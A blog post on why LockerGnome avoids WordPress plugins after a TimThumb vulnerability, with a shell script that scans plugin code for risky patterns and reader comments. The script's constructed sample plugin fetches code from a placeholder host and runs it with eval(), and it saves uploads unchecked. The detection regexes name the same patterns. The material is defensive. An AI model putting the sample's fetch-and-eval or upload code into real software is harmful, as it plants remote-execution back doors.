Why LockerGnome Doesn’t Rely On WordPress Plugins

The Register is reporting on a new “zero day” vulnerability in WordPress installs that run TimThumb. LockerGnome wasn’t at risk, because we hate WordPress plugins. That isn’t to say we are completely plugin-free; it is hard to have a WordPress install without the SiteMap plugin. But other than that, we are pretty much plugin-free.

Whenever we do work with plugins, we end up rewriting them. This doesn’t always make them more secure, but it does make them different. People knock “security through obscurity,” and rightly so as a primary defence, but a bot that blindly replays a known exploit against a non-standard version of the software fails whenever the rewrite happened to break the code path the exploit depends on. If that path is intact, the changes buy you nothing, so this is a speed bump for mass scanners rather than a fix. At least when we do get hacked, it is more likely to be by someone who genuinely hates us than by someone who wants to sell herbal Viagra.

TimThumb is actually one of the plugins we actively avoid: not because we knew it was faulty, but because we didn’t want to read every line of its code to find out whether it was.

In general, the things to look for to make sure you aren’t installing a bad plugin include:

Avoid anything that uses curl to reach a domain you don’t trust; the same goes for fopen() and file_get_contents() pointed at a URL.

Don’t run anything that uses eval(). It executes code assembled from strings, so anything an attacker can get into that string (a request parameter, a fetched file, a database value) becomes code, and it is a favourite place to hide a back door.

Don’t run anything that auto-updates. Despite the convenience, the code you vetted today can be replaced overnight by code you have never seen, and you are trusting whoever controls the update server. This puts you at risk.

Don’t run anything that adds or intercepts upload capabilities (TimThumb, for example). Most things that just run, take no uploads and don’t “dial home” can’t do much damage. There are exceptions, but for the most part, if the plugin’s code lives in a little box with no way for outside input to reach it, it can’t hurt you.

With WordPress, it’s not just plugins that can bite you. Most themes have a functions.php that adds to WordPress’s functionality, and it is a very common place for attackers to bury code that gives them a back door to your site. This is really a problem WordPress brings on itself. WordPress doesn’t have themes or templates in the usual sense; it has APIs that people build pages around. A real template would work like Mad Libs: “Today is <date>. This is my post titled <title>. <post>”, with nothing but substitution allowed. WordPress themes are not like that; they are PHP that runs. Some markup that doesn’t change, then “do some code”, then more markup, and in the middle of what looks like a perfectly benign bit of template can sit a line that says “if this is an Amazon link, swap in my affiliate ID” or “add an invisible link to a porn site.”
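Turning the checklist above and the functions.php warning into something you can run: the script below is an added example, not LockerGnome’s code and not part of WordPress. It greps a plugin or theme directory for the markers the list names (curl, fopen/file_get_contents, eval, upload handling) plus two I have added on my own judgement: WordPress’s remote-fetch helpers wp_remote_get/wp_remote_post/download_url (the usual way a plugin dials home or auto-updates) and base64_decode/gzinflate/str_rot13, which back doors commonly use to hide the string that ends up in eval. The label names are mine, and the two sample plugin files it scans are constructed for the demo. A hit means “read this line”, not “this plugin is malicious”.

```shell
#!/bin/sh
# Added example (not LockerGnome's code, not WordPress code): static triage of a
# WordPress plugin or theme directory for the warning signs in the list above.
# Each marker is an extended regex over PHP source; the labels are my own grouping.

# Print how many lines under directory $1 match extended regex $2 (PHP files only).
count_marker() {
  find "$1" -name '*.php' -exec grep -En "$2" {} + | wc -l | tr -d ' '
}

# Print a per-label report (matching lines) on stderr and the number of
# flagged labels on stdout, so callers can use the count without parsing text.
audit_plugin() {
  dir=$1
  flagged=0
  for entry in \
    'remote-fetch;curl_(init|exec|setopt)[[:space:]]*\(|wp_remote_(get|post)[[:space:]]*\(|download_url[[:space:]]*\(' \
    'file-or-url-open;(fopen|file_get_contents|fsockopen)[[:space:]]*\(' \
    'code-from-strings;(^|[^a-zA-Z0-9_])eval[[:space:]]*\(|create_function[[:space:]]*\(' \
    'obfuscation;(base64_decode|gzinflate|str_rot13)[[:space:]]*\(' \
    'upload-handling;\$_FILES|move_uploaded_file[[:space:]]*\('
  do
    label=${entry%%;*}        # text before the first ';'
    regex=${entry#*;}         # everything after it (the regex itself may contain '|')
    n=$(count_marker "$dir" "$regex")
    if [ "$n" -gt 0 ]; then
      printf 'FLAG %-18s %s line(s)\n' "$label" "$n" >&2
      find "$dir" -name '*.php' -exec grep -En "$regex" {} + | sed 's/^/    /' >&2
      flagged=$((flagged + 1))
    fi
  done
  echo "$flagged"
}

# Constructed sample plugin directory for the demo: one file that trips every
# marker, one that trips none. Neither is real WordPress or TimThumb code.
make_sample_plugin() {
  dir=$(mktemp -d)
  cat > "$dir/bad-plugin.php" <<'EOF'
<?php
/* Constructed sample: deliberately shows the patterns the list warns about. */
$ch = curl_init('http://updates.example.invalid/check.php');            // dials home
$code = file_get_contents('http://updates.example.invalid/latest.txt'); // fetches code
eval($code);                                                            // runs it
if (isset($_FILES['thumb'])) {                                          // accepts uploads
    move_uploaded_file($_FILES['thumb']['tmp_name'], 'cache/' . $_FILES['thumb']['name']);
}
$hidden = base64_decode('aGVsbG8=');                                    // obfuscated blob
EOF
  cat > "$dir/clean-plugin.php" <<'EOF'
<?php
/* Constructed sample: registers one shortcode and touches neither network nor uploads. */
add_shortcode('hello', function ($atts) { return esc_html('Hello'); });
EOF
  echo "$dir"
}

# Stand-alone run: audit the constructed sample, then clean up.
sample=$(make_sample_plugin)
total=$(audit_plugin "$sample")
echo "flagged categories: $total"
rm -rf "$sample"
```

In real use, point audit_plugin at wp-content/plugins/NAME or wp-content/themes/NAME before activating it; the clean sample shows that a plugin which only registers a shortcode produces no flags, while the bad sample lights up all five labels. Expect noise from legitimate fopen() on local files: the point is to know which lines to read, not to replace reading them.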

I don’t even agree with Google’s Webmaster Tools sending “update your WordPress” announcements. I like to know that my software won’t explode. Lots of people got tripped up by the 2.3.1 upgrade, which required all your posts to be UTF-8 or they showed random weird characters. That isn’t great for SEO or user experience.

The really short version: if you don’t read every line of code, you don’t know what is broken. And if you don’t change a few bits here and there, you are exactly as vulnerable as everyone else.

  • Anonymous

    TimThumb is the worst piece of crap ever. If you are trying to use a CDN to cache images, it won’t work with TimThumb because the script has to run anyway and it creates its own local image.

    Also, if you’re running a high-traffic website, that plugin will be the downfall of it because it puts so much stress on the server. Best bet is just to use the built-in thumbnail utility for WordPress.

  • http://blog.discoveringstyle.com BlueCockatoo

    I have recently got into writing plugins for my WordPress blog and am pretty impressed and pleased with the functionality available through their API. I can also see how it could be abused. It is a shame that we have to worry about it like that, especially because many people just don’t have the skills or patience to learn the skills they need to build their own plugins so have to rely on what’s offered that others have written.

    Honestly, you are lucky, Chris, that you and your staff can do what needs to be done with your WP installations, because most people just can’t… It’s easy to say “don’t use any plugins you didn’t write/inspect yourself”, but just not practical for the majority of bloggers who are non-technical. Not sure what a viable alternative is, though. :(

  • http://twitter.com/jeffnorris J Norris

    Don’t blame the plugins, or the platform. Blame the admin that trusts a plugin, an add-in, a script kiddie and implements it on their blog. WordPress has a great community, and when a vulnerability is found they are quick to take action; this, of course, is when it’s in the ‘core’ code and not 3rd-party add-ins.

    That being said, the number of plug-ins that phish, or are dangerous to run, are few and far between. I have heard Chris say that his site is so shimmed together that it is a kludge. This is due to having many developers piece things together, not document it, or make mistakes. Again, not to blame the platform, but the developer and ultimately the user of the platform itself. If you don’t like it, change it; after all, it is open source.

  • Derek Harding

    “you can’t be hacked via a bot that just tries known exploits over and over if your site runs a non-standard version of the software”

    Sorry but this is simply not true. Unless your changes break specific functionality required by the exploit (not something that’s guaranteed) you will still be vulnerable.

    Ultimately this problem exists for any open, extensible system. The solutions are either
    a. Severely restrict the extensibility so nothing dangerous can be done or
    b. Validate every extension before it’s allowed to be used, à la the iTunes Store.

  • Anonymous

    So what do the small biz owners who are NOT nerds and/or have no time do? Where are the folks we can hire who can do a test on our sites and tell us what plugins are “bad”?

  • http://sunnyis.me/ Sunny Singh

    It really is the responsibility of the site owner/manager. Sure there are many faulty and insecure plugins out there, but you shouldn’t freely install every plugin that you find “cool” and expect everything to be okay. Take a look at the ratings, reviews, and ask yourself whether installing it is really needed. Most of the functionality of plugins I find people installing can usually be achieved with raw code, and it’s understandable that not everyone is a developer, but it’s better to know what you’re doing before finding out that you’ve been hacked.

    It’s also usually never WordPress’s fault, the staff take security very seriously and work fast to fix bugs and holes and then release an update. It is up to you, however, to make sure that you are using the latest version of WordPress and installed plugins, and that you’ve done at least some maintenance checkups.

    Just a quick tip though, instead of installing a plugin see if you can edit the template files yourself to embed something like sharing buttons via a service like AddThis. A plugin automates the embedding of code within your site, but if you do it manually you will have more control and trust over what you have running.

  • http://twitter.com/UnchartedRadio Alistair Barnett

    TimThumb is not a WordPress Plugin, it’s a script. It’s not like anyone can just install and activate it like a normal plugin. Only someone who knows what they’re doing will be able to implement it, but of course someone could be using a theme that has built-in support for it. In either case, it’s simple enough to replace or fix the code when a vulnerability is known.

    Also, shouldn’t LockerGnome be using the latest version of WordPress? Yes, I realize that certain plugins (even though you hate them) may not be compatible and the UTF-8 requirement is annoying, but you’re taking a huge risk by not having the latest security and bug fixes.